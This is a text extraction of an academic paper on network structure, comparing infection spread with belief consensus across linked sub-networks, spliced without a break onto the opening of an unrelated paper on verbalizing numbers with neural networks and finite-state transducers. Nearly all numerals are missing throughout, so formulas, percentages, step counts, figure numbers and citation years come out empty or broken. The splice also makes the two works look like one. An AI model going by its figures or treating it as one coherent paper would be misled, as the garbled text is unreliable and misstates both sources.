with others with similar characteristics, often take the form of clustered sub-networks with limited degrees of linkage; precisely the type we study here. our focus is on the implications of a network structure, however, not how a network may have acquired that structure. we focus on the structure of contact and informational networks and the impact of that structure on the dynamics of infection and information. in the first section we outline simple analytic results and a wider spread of agent-based simulation results regarding the impact of degree of linkage between sub- networks on the spread of infection across a community. those results regarding simple diffusion serve as a base of comparison for the very different results regarding the effects of degree of linkage on the transmission of beliefs. the dynamics of belief turns out to be very different from the dynamics of contact infection. for infection, measured in terms of average time to total infection across a network, it is the structure of the network or its sub- networks that is of primary importance— whether the basic network or networks at issue form rings, total networks, hubs, wheels, small worlds, scale-free or random networks. the degree of linkage between sub-networks of such a type is of relatively minor importance for infection. for belief transmission on the model we construct, in contrast, measured in terms of average time to total consensus, network structure is of minor significance. where the dynamics of belief is at issue, it is the degree of linkage between sub-networks that is of primary importance. 
the effect of degree of linkage on belief change, we show, regardless of network type, shows the pattern of a classic power law. our effort here is to emphasize a basic point regarding the different dynamics of belief and infection across networks. more complete details of both analytic results and results from simulation are available in an on-line appendix at www.pgrim.org/connections. infection dynamics across linked sub- networks first example of ring and total networks figure shows a series of four network structures, clearly related in terms of structure. the network on the left is a single total network, also known as a complete network or maximal graph. the three pairs on the right form paired sub-networks with increasing numbers of connecting links. we will use degree of linkage in a relative sense to refer to increased connecting links or bridges of this sort. a quantitative measure is possible in terms of the number of actual linkages between nodes of distinct groups or sub-networks over the total possible. we focus on varying degrees of connection between sub-networks of varying structure. for simplicity we use just two sub-networks of equal size, concentrating on ring sub-networks, total or connected networks, small worlds, random and scale-free sub-networks. how does the degree of connection between two sub- networks affect the dynamics of diffusion or infection across the network as a whole? how do results on degree of connection between sub- networks of a specific structure compare with results on a single network of the same structure to which the same number of links are added? here theoretical fundamentals trace to granovetter ; and an early example of full linkage between total sub-networks, such that every node in one sub-network will connect to every node in the other sub-network, will result in the single total network on the left. but of course it will not hold in general that full linkage between sub- networks of type x will result in a single network of type x: full linkage between ring networks will not result in a single ring. figure . a single total network and increased degrees of linkage between total sub-networks network analysis regarding infection appears in klovdahl . some results are simple and analytic, but also indicate the variety that can be expected. consider, at one extreme, a network composed of two totally connected sub-networks with a single link between them, as in the second network in figure . how many steps will be required to total infection, starting from a single random infected node? assuming a % infection rate, where n is the total number of nodes, the average number of steps to total infection is: where n is the total number of nodes. from any node other than those on the ends of our connecting link, there are three steps to total infection: ( ) to all nodes of the immediate connected networks, ( ) across the one connecting link, and ( ) from there to all nodes of the opposite connected network. if the initially infected node is one of those on the ends of our connecting link, there are merely two steps to total infection, giving us the formula above. adding further links has no dramatic effect in such a case. because our sub-networks are totally connected, a first step in every case infects all nodes in a sub-network; from there any number of links between sub-networks merely transfer the infection to the second sub- network. 
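the counting argument just given determines the expressions that the surrounding text refers to; the block below is a reconstruction of those omitted formulas, not a quotation from the paper. with a 100% infection rate, the two endpoints of the single connecting link need only two steps and the remaining n − 2 nodes need three; the same counting with m discrete links gives the general form used in the next paragraph.

```latex
% reconstructed average time to total infection for two totally connected
% sub-networks of equal size (100% infection rate)
% single connecting link:
\[
  \bar{s}(n) \;=\; \frac{2\cdot 2 + 3\,(n-2)}{n} \;=\; 3 - \frac{2}{n}
\]
% m discrete links (2m link-endpoint nodes need two steps, n - 2m need three):
\[
  \bar{s}(n,m) \;=\; \frac{2\,(2m) + 3\,(n-2m)}{n} \;=\; 3 - \frac{2m}{n}
\]
% limits: for fixed m, \bar{s} approaches 3 as n grows; for m = n/2, \bar{s} = 2.
```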
for a network with two sub-networks of equal size, therefore, again assuming an infection rate of % rate and incorporating n nodes and m discrete links between sub- networks (links sharing no nodes), the average time to total infection will be simply: as n increases relative to m ≠ , time to infection approaches a limit of . as m increases relative to n, with a limit of m = . n, time to infection approaches a limit of . for a single total network, like that on the left in figure , any 'added' linkages would simply be redundant, with no effect at all: infection will in all cases be in a single step. where sub-networks are total, variance in infection time is necessarily just between and steps. at the other extreme is the case of a network with rings as sub-components. here variance in infection time is much greater. the maximal number of steps to full infection from a single node across a ring sub-network is s/ in order to keep the outline of basic relationships as simple as possible we ignore the complication that links can share a single node at one end. with s as the number of nodes for that sub- network where s is even, or (s – )/ in the case of odd numbers of nodes. the longest time for diffusion across a network of two equal-sized rings each with an even number of nodes n/ is therefore: where the number of nodes n/ in each sub- network is odd the maximal number of steps is: if the source of infection is one of the nodes on the end of a bridge between sub-networks, time to infection will be minimal: where n/ is even the minimal time to infection will be where n/ is odd, time to infection will be variance between maximum and minimum times to total infection is therefore extremely sensitive to the structure of sub-networks. in the case of total sub-networks, that variance is simply regardless of the number of nodes. in the case of ring sub-networks, the variance is close to n/ . the consequences for prediction are clear: to the extent that a social network approaches a total network, point predictions of infection times can be made with a high degree of confidence. to the extent that a social network approaches a ring, on the other hand, point predictions will not be possible without wide qualification. the structure of sub-networks is crucial for other factors as well. we have noted that increasing links between sub-networks has a minimal effect where those sub-networks are total. where sub-networks are rings of nodes, in contrast, the effect is dramatic. the top line in figure shows results from a computer-instantiated agent-based model in which we progressively increase the number of links between random nodes of those sub- networks from to . for each number between and we create networks with random links of that number between sub- networks, taking the average over the runs. for ring sub-networks the time to full infection decreases from an average of . steps for cases in which there is a single link between ring sub-networks to . for cases in which there are links. similar simulation results for added links between total sub-networks, in contrast, show a relatively flat result with decline in average time to infection from only . to . . difference in network structure clearly makes a major difference in time to total infection. that difference is not due to degree of linkage between sub-networks, however. a graph of results in which links are added across a single ring and not between ring sub-networks shows a result almost identical to that in figure . 
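an agent-based run of the kind just described can be sketched in a few lines. this is only a minimal illustration, not the authors' model: it assumes a 100% infection rate, two equal ring sub-networks joined by a chosen number of random bridge links, synchronous spreading from one random seed, and placeholder values for the ring size, bridge counts and number of runs.

```python
# minimal sketch of infection spread over two ring sub-networks joined by bridges.
# parameter values (ring size, number of bridges, number of runs) are illustrative.
import random

def two_rings_with_bridges(half, bridges):
    """adjacency dict for two rings of `half` nodes each plus random bridge links."""
    adj = {v: set() for v in range(2 * half)}
    for offset in (0, half):                      # build each ring
        for i in range(half):
            a, b = offset + i, offset + (i + 1) % half
            adj[a].add(b); adj[b].add(a)
    while bridges > 0:                            # add distinct random bridges
        a, b = random.randrange(half), half + random.randrange(half)
        if b not in adj[a]:
            adj[a].add(b); adj[b].add(a); bridges -= 1
    return adj

def steps_to_total_infection(adj):
    """synchronous spread with 100% infection probability from one random seed;
    assumes at least one bridge, so the network is connected."""
    infected = {random.choice(list(adj))}
    steps = 0
    while len(infected) < len(adj):
        infected |= {n for v in infected for n in adj[v]}
        steps += 1
    return steps

def average_time(half=50, bridges=1, runs=100):
    return sum(steps_to_total_infection(two_rings_with_bridges(half, bridges))
               for _ in range(runs)) / runs

print(average_time(bridges=1), average_time(bridges=10))
```

replacing the ring construction with totally connected sub-networks, and the deterministic step with a probabilistic one, gives the other cases discussed above.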
the lesson from ring and total networks is that it is not the degree of linkage between sub- networks that affects time to total infection but overall network structure itself, whether characterizing a single network or linked sub- networks. changes in infection rates with additional random links ( ) across a single network and ( ) between two smaller networks with the same structure show very much the same pattern. degrees of linkage between sub- networks interact with the structure of those sub-networks in order to generate patterns of infection, but it is the structure of the networks rather than the degree of linkage that plays the primary role. analytical and simulation results for hub and wheel networks, very much in line with conclusions above, are available in an online appendix (www.pgrim.org/connections). figure . average time to total infection with increasing links between sub-networks infection across small world, random, and scale-free networks for patterns of infection, the importance of general structure type over degree of linkage between sub-networks holds for small world, scale free, and random networks as well. results for small world networks are shown in the second line from the top in figure with roughly a % probability of rewiring for each node in an initial single ring (see watts & strogatz ). increasing linkages between sub-networks from to results in a decrease in steps to total infection from . steps to our probability is 'roughly' % because in each case we add minimal links so as to assure a connected network. without that assurance, of course, infection is not guaranteed to percolate through the network as a whole. . . increasing links within a single small world follows virtually the same pattern, with a decrease from . to . . similar results for random and scale-free networks appear in the third and fourth graphed lines of figure . for random networks, roughly . percent of possible connections are instantiated within each sub-network, with minimal links needed to guarantee connected networks. our scale-free networks are constructed by the preferential attachment algorithm of barabási and albert ( ). here as before there is little difference where additional links are added within a single network, whether small-world or scale-free. in each case the number of initial steps is slightly smaller, but only in the first steps or so is there any significant difference and convergence is to the same point. in the case of random networks, times decrease from . to . . in the case of scale-free networks, times decrease from . to . . in all the cases considered, it is not degree of linkage between sub-networks but the network structure involved in both single and linked sub-networks that produces network-specific signatures for infection. this largely accords with analytic results by golub and jackson (forthcoming) on diffusion dynamics across linked random networks. golub and jackson find that in the limit degree of linkage between random networks has no effect on time to total infection. what our results indicate is that such a result is by no means restricted to random networks, holding across network types quite generally. where infection is concerned, a prediction of time to total infection demands a knowledge of the general structure of the contact network at issue—ring or total, for example, scale-free or random, but does not demand that we know whether it is a single network or a linked set of smaller networks of that same structure that is at issue. 
infection on networks: qualifications and provisos results to this point have been calculated with an assumption of % infection—a disease guaranteed to be transmitted at every time-point of contact between individuals. more realistic assumptions regarding rate of infection affect the rates calculated above, more pointedly emphasizing the importance of structure. here we again use ring and total networks as an example. where sub-networks are total, probability of infection from single contact really makes a golub and jackson characterize their results using the term 'homophily', defined in terms of the relative probability of node connection within as opposed to outside of a group or sub-network. for random networks, though not for other network structures, this corresponds to the degree of linkage between sub-networks that is our focus here. difference only at the link between sub- networks: as long as the probability of infection exceeds /n, a quick infection of all individuals in the total sub-networks is virtually guaranteed. simulation results indicate that with a single link between total sub-networks the average time to full infection shifts only from an average of . steps to an average of . with a change of infection rate from % to %. for ring sub-networks, on the other hand, the same change in infection rate roughly doubles the time to full infection across all numbers of linkages. for more realistic infection rates, therefore, it is more important rather than less to know the structure of social networks. if those sub- networks approximate total networks, neither infection rate nor additional links between sub- networks make much difference. if sub- networks approximate ring networks, both number of links and infection rate will make a dramatic difference in the course of an infection. where average time to infection is our measure, degree of linkage between sub-networks as opposed to additional links within a single network of that structure is not of particular significance. but here we need to add an important proviso: this does not mean that the course of an epidemic across a single network and across sub-networks with various degrees of linkage is not significantly different. that dynamic is often very different—in ways that might be important for intervention, for example—even where average time to total infection is the same. the typical graphs in figure show the rate of new infections over time for (a) a single network and (b) linked sub- networks of that type. single networks show a smooth normal curve of increasing and declining rates of new infection. linked sub- networks show a saddle of slower infection between two more rapid peaks. despite uniformity of predicted time to total infection, therefore, sparsely linked sub- networks will always be 'fragile' at those links, with temporal saddle points in the course of an figure . contrasting dynamics of infection in single and linked sub-networks epidemic to match. those weak linkages and saddle points offer crucial opportunities for targeted vaccination in advance of an epidemic, or intervention in the course of it. information dynamics across linked sub- networks what you believe travels differently. in what follows we use a simple model of belief updating to show the crucial importance of degree of sub-network linkage in belief or information transmission across a network. some earlier results have noted similarities in infection dynamics and the spread of ideas (newman , redner , börner et. al. ). 
our purpose is to emphasize crucial differences between them. in this first model our agents' beliefs are represented as a single number between and . these are beliefs in the severity of a disease, perhaps, the probability of contracting the disease, or the effectiveness of vaccination. (harrison, mullen, & green ; janz & becker, ; mullen, hersey, and iverson, ; strecher & rosenstock, ). agents are influenced by the beliefs of those around them, updating their belief representation in terms of the beliefs of those with whom they have information linkages. to this extent we can argue that the model is relatively realistic: some beliefs can be represented on such a scale, and people are influenced to change those beliefs by, among other things, the expressed beliefs of those with whom they have contact. what is admittedly unrealistic is the simple form of belief updating we use in the model: an averaging of current beliefs with those with whom one has network contact. no-one thinks that averaging of beliefs in an informational neighborhood captures the real dynamics of belief change. such a mechanism does, however, instantiate a pattern of reinforcement: the more one's beliefs are like those of one's network neighbors, and the more they are like more of one's network neighbors, the less inclination there will be to change those beliefs. the more one's beliefs are out of sync with one's neighbors, the greater the pressure there will be to change one's beliefs. that beliefs will change in accord with some pattern of reinforcement along those lines is very plausible, backed by a range of social psychological data, and is therefore an aspect of realism in the model. what is unrealistic is the particular form of reinforcement instantiated here—the particularly simple pattern of belief averaging, applied homogeneously across all agents. in order to be informative regarding an exterior reality, a model, like any theory, must capture relevant aspects of that reality. in order to offer both tractability and understanding, a model, like any theory, must simplify. this first model of belief transmission is intended to capture a reality of belief reinforcement; the admittedly artificial assumption of belief averaging is our simplification. our attempt, then, is not to reproduce any particular pattern of realistic belief change but to emphasize the impact of certain predictable for background on both the importance and limit of realism in different forms of models, see grim, rosenberg, rosenfeld, anderson, & eason and rosenberg, grim, rosenfeld, anderson & eason . characteristics of belief change—with reinforcement a primary component—on the dynamics of belief. in particular, we want to emphasize the major differences between the dynamics of belief change across information networks and the dynamics of infection diffusion across contact networks, outlined above. what you believe travels differently. given belief averaging, and regardless of initial assignment of belief representations, all agents in this model eventually approach the same belief value. we can therefore measure the effect of network structure on belief convergence by measuring the number of steps required on average until all agents in the network are within, say, a range of . above or below the mean belief across the network as a whole. in what follows we use this range of variance from the mean as our measure of convergence, averaging over runs in each case. we begin with polarized agents. 
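the belief-averaging model just described can also be sketched minimally; the code below is not the authors' implementation. it assumes polarized starting pools as described in the next paragraph, with placeholder means, standard deviation and consensus tolerance (the paper's exact values are not reproduced here), and it updates each agent synchronously to the average of its own belief and its neighbors' beliefs, one simple way of instantiating the averaging rule.

```python
# minimal sketch of the belief-averaging model; initial means, deviation and the
# consensus tolerance below are placeholders, not the paper's values.
import random

def initial_beliefs(adj, half, mu_low=0.25, mu_high=0.75, sd=0.1):
    """polarized start: one sub-network drawn around mu_low, the other around mu_high."""
    return {v: min(1.0, max(0.0, random.gauss(mu_low if v < half else mu_high, sd)))
            for v in adj}

def steps_to_consensus(adj, beliefs, tol=0.05):
    """synchronous averaging of each agent's belief with its neighbors' beliefs;
    assumes a connected network, so repeated averaging converges."""
    steps = 0
    while True:
        mean = sum(beliefs.values()) / len(beliefs)
        if all(abs(b - mean) <= tol for b in beliefs.values()):
            return steps
        beliefs = {v: (beliefs[v] + sum(beliefs[n] for n in adj[v])) / (1 + len(adj[v]))
                   for v in adj}
        steps += 1
```

reusing a linked sub-network construction such as the one sketched above for infection, the same added bridge links can then be seen to shorten time to consensus far more sharply than they shorten time to total infection.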
half of our agents are drawn from a pool with belief measures that form a normal distribution around . , with a deviation of . . the other half are drawn from a pool with belief measures in similar normal distribution around . . in studying linked sub-networks our agents in one sub-network are drawn from the . pool; those in the other are drawn from the . pool. in the case of single networks agents are drawn randomly from each pool. we found belief polarization of this form to be necessary in order to study the effects of sub-network linkage in particular; were beliefs of all our agents merely randomized, convergence to an approximate mean could be expected to occur in each sub-network independently, and time to consensus would not then be an adequate measure of the effect of sub-network linkage. belief diffusion across ring and total networks in outlining the dynamics of infection we contrasted linked sub-networks of particular structures—ring, small world, random, total, and scale-free—with single networks of the same structure. in exploring the dynamics of belief we will again study these types side by side. as we add additional links between sub- networks, how does the dynamics of belief diffusion change, measured in terms of time to consensus across the community. we progressively add random links ( ) between belief-polarized ring sub-networks, and ( ) within a single ring network of belief-polarized agents. average times to consensus are shown in figure . increasing linkages between polarized ring sub- networks makes a dramatic difference. average time to consensus for a single linkage in such a case is . . the average time to consensus for linkages is . , with a distinct and characteristic curve between them. for infection, we noted, there is virtually no difference between added links within a single ring network and added links between ring sub- networks. in the case of belief, in contrast, there is a dramatic difference between the two graphs. within a single total network, all agents will achieve a mean belief in a single step; additional linkages in such a case are merely redundant. results in total sub-networks, in contrast, parallel those for rings above. average steps to belief convergence with a single link approximate steps in both cases; with links, average time to convergence is in the case of rings and in the case of total sub-networks. the overall pattern of the two graphs is also very much the same. what that similarity shows is the striking effect of degree linkage in each case: an effect that in the transmission of belief overrides the fact that we are dealing with totally distributed ring networks in one case, totally connected networks in the other. belief transmission across small world, random, and scale-free networks the same contrasts between single and linked sub-networks in the case of belief transmission hold for other network structures as well. the effect of added linkages within a single small-world network closely parallels that for the single ring shown above. results for added linkages in small-world sub-networks are dramatically different. in absolute terms the results for small worlds differ from those shown for rings, declining from steps to . . the shape of the curve for small worlds, however, is very much that shown for rings above. given a single random network, using . % of possible linkages, additional linkages give a decline in time to belief consensus from only approximately steps to . where random sub- networks are at issue (using . 
% of possible linkages in each sub-network), the curve is again that displayed for rings above, though here absolute values decline from to . . for single scale-free networks, additional linkages give a roughly linear decline from to steps. for scale-free sub-networks, additional linkages again follow the curve shown above, here with absolute values dipping from to . . a similar curve characterizes effects of degree linkage in belief transmission regardless of the basic structure of the sub-networks involved. although absolute values across that curve differ significantly, the shape of the curve does not. we emphasize this point in figure by plotting belief transmission results for sub-network types in log-log form. linkage degree effects follow the same pattern regardless of the structure of sub-networks. if one wants to plot the course of an epidemic, we noted in section i, it is crucial that one knows the structure of the networks involved. if one wants to plot the course of belief transmission, knowledge of structure is much less important. the particular structure of networks is important in order to gauge whether a single link between sub-networks will allow consensus in steps or , as indicated for hub and total networks figure . time to belief consensus with increasing linkages in single ring and between ring sub-networks figure . time to belief consensus with increasing linkages between sub-networks (plotted log-log) in figure . the pattern of changes in belief transmission with increasing linkages between sub-networks from any initial point, however, is precisely the same regardless of network structure. that pattern is the classic signature of power law distributions, indicating that the relationship between increased linkage and time to consensus parallels a range of natural and social phenomena, including the relationship between frequency and size of earthquakes, metabolic rate and body mass of a species, size of a city and the number of patents it produces. power law distributions also appear in some empirically observed characteristics of biochemical, protein, citation and sexual contact networks (faloutsos, faloutsos, & faloutsos, ; jeong, tombor, albert, ottvai, & barbási ; fell & wagner ; liljeros, edling, amaral, stanley, & Åberg ; newman , ). the fact that such an effect appears in linkage effects on the dynamics of belief suggests the possibility of incorporating a range of theoretical and methodological work from other disciplines in studying behavior dynamics in the spread of disease, particularly with an eye to the effect of belief polarization, health care disparities, and social linkage or integration between ethnic and socio-economic sub- communities. conclusions & future work our focus here has been on the structure of contact and informational networks and the very different impact of aspects of that structure on the dynamics of infection and information. for infection, measured in terms of average time to total infection across a network, it is the structure of the network or sub-networks that trumps other effects. in attempting to gauge time to total infection across a community, the primary piece of information needed is whether the social network or component networks at issue approximate rings, hubs, wheels, small worlds, random, scale-free or total networks. 
for time to total infection, degree of linkage between sub-networks is of much less importance, though we have noted that points of linkage continue to play an important role with regard to fragility and prospects for targeted intervention. for information, measured in terms of average time to belief consensus, the importance of general structure and linkage between sub- networks are reversed. on the model of belief used here, in attempting to gauge the dynamics of information flow across a community, the primary piece of information needed is the degree of linkage between composite sub- communities, whatever their internal structure. the fact that the particular structure of those sub-communities is of lesser importance is highlighted by the fact that average time to belief consensus given increasing linkages follows the same familiar power-law pattern regardless of networks structures involved. it is quite plausible that belief transmission involves strong reinforcement effects; the model of belief used here is designed to capture such an effect. in other regards, however, the belief model used is quite clearly artificial. belief change is by simple averaging of information contacts, and all agents follow the same formula for belief updating. our attempt in future work will be to test the robustness of conclusions here by considering a range of variations on the central model of belief change. references auld, m. c. ( ). choices, beliefs, and infectious disease dynamics. journal of health economics , - . barbasi, a.-l. & r. albert ( ). emergence of scaling in random networks. science , - . barrett, c. l., k. bisset, j. leidig, a. marathe, & m. marathe ( ). estimating the impact of public and private strategies for controlling an epidemic: a multi-agent approach. proceedings of the twenty-first innovative applications of artificial intelligence conference, aaai, - . börner, k., maru, j. t., & goldstone, r. l. ( ). the simultaneous evolution of author and paper networks. proceedings of the national academy of sciences of the usa, (suppl. ), - . centola, d., & m. macy ( ). complex contagion and the weakness of long ties. american journal of sociology , - . del valle, s., h. hethcote, j. m. hyman, & c. castillo-chavez ( ). effects of behavioral changes in a smallpox attack model. mathematical biosciences, , - . epstein, j. m., j. parker, d. cummings, & r. a. hammond ( ). coupled contagion dynamics of fear and disease: mathematical and computational explorations. plos one ( ): e . doi: . /journal.pone. eubank, s., h. guclu, v. a. kumar, m. marathe, a. srinivasan, z. toroczkai, & n. wang ( ). modeling disease outbreaks in realistic urban social networks. nature : - . fell, d., & a. wagner ( ). the small world of metabolism. nature biotechnology , - , reprinted in newman, barbási, & watts, the structure and dynamics of networks, princeton: princeton university press, . faloutsos, m, p. faloutsos, & c. faloutsos ( ). on power-law relationships of the internet topology. sigcomm ' , reprinted in newman, barbási, & watts, the structure and dynamics of networks, princeton: princeton university press, . ferrari, m. j., s. bansal, l. a. meyers & o. n. bjørnstad ( ). network frailty and the geometry of herd immunity. proceedings of the royal societ. b , - freeman, l. c. ( ). segregation in social networks. sociological methods and research : - . funk, s., e. gilad, c. watkins, & v. a. a. jansen ( ). the spread of awareness and its impact on epidemic outbreaks. 
proceedings of the national academy of sciences ( ), - , www.pnas.org / cgi / doi / . / pnas. golub, b., & m. o. jackson, forthcoming. how homophily affects learning and diffusion in networks. granovetter, m. s. ( ). the strength of weak ties. american journal of sociology , - . grim, p., r. rosenberg, a. rosenfeld, b. anderson, & r. eason ( ). how simulations fail. group for logic & formal semantics research report # - , suny stony brook. hallett, t. b., s. gregson, j. j. c. lewis, b. a. lopman, & g. p. garnett ( ). africa: behavioral change in generalized hiv epidemics: impact of reducing cross- generational sex and delaying age at sexual debut. sexually transmitted infections , p. i -i . hamilton, d., m. handcock & m. morris ( ). degree distributions in sexual networks: a framework for evaluating evidence. sexually transmitted diseases , - . harrison, j. a., p. d. mullen, & l. w. green ( ). a meta-analysis of studies of the health belief model. health education research : – . janz, n. k., & m. h. becker ( ). the health belief model: a decade later. health education quarterly : – . jeong, h., b. tombor, r. albert, z. n. ottvai, & a.-l. barbási ( ). the large-scale organization of metabolic networks. nature , - , reprinted in newman, barbási, & watts, the structure and dynamics of networks, princeton: princeton university press, . keeling, m., . the implications of network structure for epidemic dynamics. theoretical population biology , – . kincaid, d. l. ( ). mass media, ideation, and behavior: a longitudinal analysis of contraceptive change in the philippines. communication research , - . klovdahl, a. s. ( ). social networks and the spread of infectious diseases: the aids example. social science & medicine , - . liljeros, f., c. r. edling, l. a. nunes amaral, h. e. stanley, & y. Åberg ( ). the web of human sexual contacts. nature , - , reprinted in newman, barbási, & watts, the structure and dynamics of networks, princeton: princeton university press, . meyers, a. m., b. pourbohloul, m. e. j. newman, d. m. skowronski & r. c. brunham . network theory and sars: predicting outbreak diversity. journal of theoretical biology , – . miller, j. c. & j. m. hyman, effective vaccination strategies for realistic social networks. physica a , – . morris, m. ( ). sexual networks and hiv. aids (suppl a), s -s . morris, m., c. podhisita, m. j. wawer & m. s. handcock ( ). bridge populations in the spread of hiv/aids in thailand. aids , - . mullen, p. d., j. hersey, & d. c. iverson ( ). health behavior models compared. social science and medicine : – . newman, m. e. j. ( ). the structure of scientific collaboration networks. proceedings of the national academy of sciences, ( ), - , reprinted in newman, barbási, & watts, the structure and dynamics of networks, princeton: princeton university press, . newman, m. e. j. ( ). power laws, pareto distributions and zipf's law. contemporary physics : – . redner, s. ( ). how popular is your paper? an empirical study of the citation distribution. european physical journal b , - . rosenberg, r., p. grim, a. rosenfeld, b. anderson & r. eason ( ). the science in simulation: a structural analysis. group for logic & formal semantics research report # - , suny stony brook. strecher, v. j., & i. m. rosenstock ( ). the health belief model. in health behavior and health education: theory, research, and practice, eds. k. glanz, f. m. lewis, and b. k. rimer. san francisco: jossey-bass. trotter, r. t., r. b. rothenberg, & s. coyle ( ). 
drug abuse and hiv prevention research: expanding paradigms and network contributions to risk reduction. connections , - . valente, t. ( ). network models of the diffusion of innovations. cresskill, n. j.: hampton press. valente, t. ( ). social networks and health: models, methods, and applications. new york: oxford university press. valente, t., & r. l. davis ( ). accelerating the diffusion of innovations using opinion leaders. annals of the aapss , - . watts, d. j., & s. h. strogatz ( ). collective dynamics of 'small-world' networks. nature , . minimally supervised number normalization kyle gorman and richard sproat google, inc. th ave., new york, ny, usa abstract we propose two models for verbalizing num- bers, a key component in speech recognition and synthesis systems. the first model uses an end-to-end recurrent neural network. the sec- ond model, drawing inspiration from the lin- guistics literature, uses finite-state transducers constructed with a minimal amount of training data. while both models achieve near-perfect performance, the latter model can be trained using several orders of magnitude less data than the former, making it particularly useful for low-resource languages. introduction many speech and language applications require text tokens to be converted from one form to another. for example, in text-to-speech synthesis, one must con- vert digit sequences ( ) into number names (thirty- two), and appropriately verbalize date and time ex- pressions ( : → twelve forty-seven) and abbre- viations (kg → kilograms) while handling allomor- phy and morphological concord (e.g., sproat, ). quite a bit of recent work on sms (e.g., beaufort et al., ) and text from social media sites (e.g., yang and eisenstein, ) has focused on detect- ing and expanding novel abbreviations (e.g., cn u plz hlp). collectively, such conversions all fall under the rubric of text normalization (sproat et al., ), but this term means radically different things in differ- ent applications. for instance, it is not necessary to detect and verbalize dates and times when preparing social media text for downstream information extrac- tion, but this is essential for speech applications. while expanding novel abbreviations is also im- portant for speech (roark and sproat, ), num- bers, times, dates, measure phrases and the like are far more common in a wide variety of text genres. following taylor ( ), we refer to cate- gories such as cardinal numbers, times, and dates— each of which is semantically well-circumscribed— as semiotic classes. some previous work on text nor- malization proposes minimally-supervised machine learning techniques for normalizing specific semi- otic classes, such as abbreviations (e.g., chang et al., ; pennell and liu, ; roark and sproat, ). this paper continues this tradition by con- tributing minimally-supervised models for normal- ization of cardinal number expressions (e.g., ninety- seven). previous work on this semiotic class include formal linguistic studies by corstius ( ) and hur- ford ( ) and computational models proposed by sproat ( ; ) and kanis et al. ( ). of all semiotic classes, numbers are by far the most im- portant for speech, as cardinal (and ordinal) num- bers are not only semiotic classes in their own right, but knowing how to verbalize numbers is important for most of the other classes: one cannot verbalize times, dates, measures, or currency expressions with- out knowing how to verbalize that language’s num- bers as well. 
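to make the verbalization task concrete, here is a minimal sketch of citation-form english number names below one million. it is our own illustration rather than any grammar from the paper, and it already hints at why hand-writing such rules for every language is costly.

UNITS = "zero one two three four five six seven eight nine".split()
TEENS = ("ten eleven twelve thirteen fourteen fifteen sixteen "
         "seventeen eighteen nineteen").split()
TENS = "twenty thirty forty fifty sixty seventy eighty ninety".split()

def verbalize(n):
    # digit sequence -> english citation-form number name, e.g. 32 -> "thirty two"
    if n < 10:
        return UNITS[n]
    if n < 20:
        return TEENS[n - 10]
    if n < 100:
        tens, rest = divmod(n, 10)
        return TENS[tens - 2] + ("" if rest == 0 else " " + UNITS[rest])
    if n < 1000:
        hundreds, rest = divmod(n, 100)
        return UNITS[hundreds] + " hundred" + ("" if rest == 0 else " " + verbalize(rest))
    thousands, rest = divmod(n, 1000)          # only handles n < 1,000,000 here
    return verbalize(thousands) + " thousand" + ("" if rest == 0 else " " + verbalize(rest))

print(verbalize(32), "|", verbalize(97000))    # thirty two | ninety seven thousand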
one computational approach to number name ver- balization (sproat, ; kanis et al., ) employs a cascade of two finite-state transducers (fsts). the first fst factors the integer, expressed as a digit se- quence, into sums of products of powers of ten (i.e., in the case of a base-ten number system). this is composed with a second fst that defines how the transactions of the association for computational linguistics, vol. , pp. – , . action editor: jason eisner. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. numeric factors are verbalized, and may also handle allomorphy or morphological concord in languages that require it. number names can be relatively easy (as in english) or complex (as in russian; sproat, ) and thus these fsts may be relatively easy or quite difficult to develop. while the google text-to- speech (tts) (see ebden and sproat, ) and au- tomatic speech recognition (asr) systems depend on hand-built number name grammars for about languages, developing these grammars for new lan- guages requires extensive research and labor. for some languages, a professional linguist can develop a new grammar in as little as a day, but other lan- guages may require days or weeks of effort. we have also found that it is very common for these hand- written grammars to contain difficult-to-detect er- rors; indeed, the computational models used in this study revealed several long-standing bugs in hand- written number grammars. the amount of time, effort, and expertise required to produce error-free number grammars leads us to consider machine learning solutions. yet it is im- portant to note that number verbalization poses a dauntingly high standard of accuracy compared to nearly all other speech and language tasks. while one might forgive a tts system that reads the am- biguous abbreviation plz as plaza rather than the in- tended please, it would be inexcusable for the same system to ever read as four hundred seventy two, even if it rendered the vast majority of numbers cor- rectly. to set the stage for this work, we first (§ – ) briefly describe several experiments with a power- ful and popular machine learning technique, namely recurrent neural networks (rnns). when provided with a large corpus of parallel data, these systems are highly accurate, but may still produce occasional er- rors, rendering it unusable for applications like tts. in order to give the reader some background on the relevant linguistic issues, we then review some cross- linguistic properties of cardinal number expressions and propose a finite-state approach to number nor- malization informed by these linguistic properties (§ ). the core of the approach is an algorithm for in- ducing language-specific number grammar rules. we evaluate this technique on data from four languages. figure : the neural net architecture for the preliminary russian cardinal number experiments. purple lstm lay- ers perform forwards transitions and green lstm layers perform backwards transitions. the output is produced by a ctc layer with a softmax activation function. input to- kens are characters and output tokens are words. preliminary experiment with recurrent neural networks as part of a separate strand of research, we have been experimenting with various recurrent neural network (rnn) architectures for problems in text normaliza- tion. 
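the character-to-word setup described in the figure caption above can be approximated as follows; this is a rough pytorch sketch with placeholder layer counts and sizes, not the configuration used in the experiments described next.

import torch
import torch.nn as nn

class CharToWordCTC(nn.Module):
    # character input, stacked bidirectional lstms, and a softmax/ctc output
    # layer over number-name words plus a blank symbol
    def __init__(self, n_chars, n_words, hidden=256, layers=2):
        super().__init__()
        self.emb = nn.Embedding(n_chars, hidden)
        self.rnn = nn.LSTM(hidden, hidden, num_layers=layers,
                           batch_first=True, bidirectional=True)
        self.proj = nn.Linear(2 * hidden, n_words + 1)   # +1 for the ctc blank

    def forward(self, chars):                  # chars: (batch, time) integer ids
        h, _ = self.rnn(self.emb(chars))       # (batch, time, 2 * hidden)
        return self.proj(h).log_softmax(-1)    # ctc training expects log-probabilities

# training would apply nn.CTCLoss to the (time, batch, n_words + 1) transposed output.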
